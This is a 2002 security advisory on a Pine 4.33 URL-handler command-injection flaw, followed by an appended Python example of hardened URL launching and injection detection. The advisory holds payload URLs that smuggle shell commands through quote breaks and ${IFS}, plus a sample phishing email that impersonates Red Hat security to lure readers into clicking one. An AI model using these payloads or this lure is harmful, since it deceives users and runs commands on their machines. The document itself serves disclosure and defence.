Pine 4.33 (at least) URL handler allows embedded commands.

From: zen-parse (zen-parseat_private)
Date: Fri Jan 04 2002 - 18:17:16 PST


    Systems: 		Pine 4.33 (under Redhat 7.0)
    			(Probably many others, haven't checked much)
    
    Vendors notified: 	Sat, 20 Oct 2001 06:50:12 +1300 (NZDT)
    And again:		Fri, 9 Nov 2001 07:14:15 +1300 (NZDT)
    And again:		Thu, 3 Jan 2002 08:15:55 +1300 (NZDT)
    
    Problem:		URL handler allows embedded commands.
    			May allow email viruses of the Outlook kind.
    
    Severity:		Extremely Low -> Very High (Dependent on current 
    			email reading habits)
    
    Workaround:		Don't view URLs from inside Pine. 
    			(ObSpam: Except for http://mp3.com/cosv/ ;])
    
    Details:
    
     This is a similar problem to the xchat 1.4.1 URL handler vulnerability.
     http://www.securityfocus.com/bid/1601
    
    
     In Pine, if a user selects a URL of the form 
    
      http://address/'&/some/program${IFS}with${IFS}arguments&'
    
     and URL handlers are installed, they will end up with the browser open
     on 
    
      http://address/
    
     and 
    
      /some/program with arguments
    
     will get executed.
    
     If you are reading your email as root, these commands will execute as
     root. (Create an alias for root to a non-privileged user instead of
     reading mail as root.)
    
     If you are reading your email as a non-privileged user, the impact is
     somewhat lower, although local exploits could be run on the computer, or
     Outlook style email viruses could be executed.
    
     If you don't view links given to you in Pine, the impact from this
     problem is non-existent.
    
     It is possible to obfuscate the URL by putting it in an HTML message
     such as the following.
    
    ----Begin html email----
    From: Redhat Network Security <rhnsecurityat_private>
    To: undisclosed list <.@.>
    Subject: Urgent update required to PINE
    Message-ID: <Pine.LNX.4.33.0110221213510.9618-200000at_private>
    MIME-Version: 1.0
    Content-Type: TEXT/html
    Content-ID: <Pine.LNX.4.33.0110221214120.9618at_private>
    Content-Length: 389
    Lines: 12
    
    <HTML>
    <BODY>
    Urgent update:<p>
    PINE allows execution of arbitrary commands.<p>
    
    <a href="http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/hole-in-pine-url-handler/';touch${IFS}/tmp/zen.was.here;'/">
    http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/hole-in-pine-url-handler/>
    <p>
    
    This link contains PINE update information. <p>
    
    You are advised to perform this immediately. <p>
    
    The link also contains other urgent update information. <p>
    
    </BODY>
    </HTML>
    ----End html email----
    
    
    Which would appear something like
    ----Begin view of email----
    
    Date: Mon, 22 Oct 2001 13:34:40 +1300
    From: Redhat Network Security <rhnsecurityat_private>
    To: undisclosed list <.@.>
    Subject: Urgent update required to PINE
    
    Urgent update:
    
    PINE allows execution of arbitrary commands.
    
    http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/ho
    e-in-pine-url-handler/
    
    This link contains PINE update information.
    
    You are advised to perform this immediately.
    
    The link also contains other urgent update information.
    
    ----End view of email----
    
    
     When this link is selected to follow, Pine changes the status/menu lines
     to read:
    
    View selected URL "http://updates.redhat.com/update_information/urgent/r..." ?  
    Y [Yes]                   U editURL                                             
    N No                      A editApp              
    
     Which appears to match the URL in the email. This probably makes detection
     of this kind of exploit attempt harder. 
    
     -- zen-parse
    
    [ A (relatively) safe way to visit http://mp3.com/cosv is to type the
      address into the address bar of the browser you are using. Contrary to a
      rumour posted several days ago, the only way I get any money from this
      site is through CD purchases. If you want to, visit the site and listen
      to the music. If you like it, you might want to buy it, or not. I hope
      nobody has any illusion of being tricked into visiting. ]
    
    
    -- 
    -------------------------------------------------------------------------
    The preceding information is confidential and may not be redistributed
    without explicit permission. Legal action may be taken to enforce this.  
    If this message was posted by zen-parseat_private to a public forum it may
    be redistributed as long as these conditions remain attached. If you are
    mum or dad, this probably doesn't apply to you.
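The post's payload works because the viewer command line is handed to a shell with the URL pasted between single quotes: an apostrophe inside the URL ends the quoting, and `&` or `;` then starts a second command. The following is an added example written for this page (it is not code from zen-parse's post, nor from Pine) showing the defensive side: a strict URL check (RFC 3986 character allowlist plus a scheme allowlist), a launcher that passes the URL as one argv element with no shell involved, a `shlex.quote` fallback for the case where a shell cannot be avoided, and a small mail-side heuristic for URLs that look like quote-breaking attempts. The handler template list and its `_URL_` placeholder are assumptions of this example, not Pine's configuration syntax; `http://address/` is the placeholder host used in the post.

```python
"""Hardened URL-handler launching (added example; assumptions are marked)."""
import re
import shlex
import subprocess
import sys

# Payload shape taken from the post; "address" is the post's placeholder host.
SAMPLE_PAYLOAD = "http://address/'&/some/program${IFS}with${IFS}arguments&'"

# RFC 3986 permits only these characters in a URL.  Braces, whitespace,
# double quotes, backticks and backslashes are not in the set, so the
# "${IFS}" trick is rejected before anything is launched.  Note that the
# apostrophe, '$', '&' and ';' ARE legal URL characters, which is exactly why
# character filtering alone is not the fix: the shell must go.
_URL_CHARS = re.compile(r"[A-Za-z0-9\-._~:/?#\[\]@!$&'()*+,;=%]+")
_ALLOWED_SCHEMES = ("http", "https", "ftp", "mailto")   # assumption: viewer set


def validate_url(url: str) -> bool:
    """Accept only syntactically clean URLs with an expected scheme."""
    if not _URL_CHARS.fullmatch(url):
        return False
    scheme, sep, _rest = url.partition(":")
    return sep == ":" and scheme.lower() in _ALLOWED_SCHEMES


# Characters that let a URL escape single quotes or trigger expansion if it
# is ever pasted into a shell command line.  '&' and ';' are deliberately
# not listed: they are normal in query strings and only matter after a
# quote-break, so keying on the quote-breakers keeps false positives low.
_QUOTE_BREAKERS = set("'\"`$\\{}() \t\n")


def looks_like_shell_injection(url: str) -> bool:
    """Mail-gateway heuristic for URLs shaped like the post's payload."""
    return any(ch in _QUOTE_BREAKERS for ch in url)


def naive_shell_command(viewer: str, url: str) -> str:
    """What a vulnerable handler builds.  Single quotes look protective but a
    quote inside the URL terminates them.  Built for inspection only."""
    return f"{viewer} '{url}'"


def safe_shell_command(viewer: str, url: str) -> str:
    """If a shell really is unavoidable, shlex.quote keeps the URL one word."""
    return f"{viewer} {shlex.quote(url)}"


def build_handler_argv(template: list, url: str) -> list:
    """Substitute the URL for the _URL_ placeholder as a single argv element
    (template syntax is an assumption of this example)."""
    return [url if arg == "_URL_" else arg for arg in template]


def run_handler(argv: list) -> str:
    """Run the viewer with no shell: argv reaches execve() verbatim, so
    '&', ';' and '${IFS}' are plain bytes.  Returns the child's stdout."""
    return subprocess.run(argv, capture_output=True, text=True,
                          check=True).stdout


def run_via_shell(command: str) -> str:
    """Run a command line through /bin/sh (used only with safe_shell_command)."""
    return subprocess.run(command, shell=True, capture_output=True,
                          text=True, check=True).stdout


def launch(template: list, url: str) -> str:
    """Validate, then launch without a shell.  Rejected URLs raise ValueError."""
    if not validate_url(url):
        raise ValueError(f"rejected URL: {url!r}")
    return run_handler(build_handler_argv(template, url))


# A stand-in "viewer" that just prints its single URL argument, so the
# no-shell path can be demonstrated offline without a real browser.
ECHO_VIEWER = [sys.executable, "-c", "import sys; print(sys.argv[1])", "_URL_"]

if __name__ == "__main__":
    print("naive :", naive_shell_command("netscape", SAMPLE_PAYLOAD))
    print("safe  :", safe_shell_command("netscape", SAMPLE_PAYLOAD))
    print("argv  :", build_handler_argv(ECHO_VIEWER, SAMPLE_PAYLOAD))
    print("flag? :", looks_like_shell_injection(SAMPLE_PAYLOAD))
```

Running the module prints the naive command line next to the quoted one; the naive string is never executed. The argv path is the real fix: even when `run_handler` is given the payload directly, the child process receives it as one unmodified argument, which is what `launch` relies on after `validate_url` has already refused it.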
    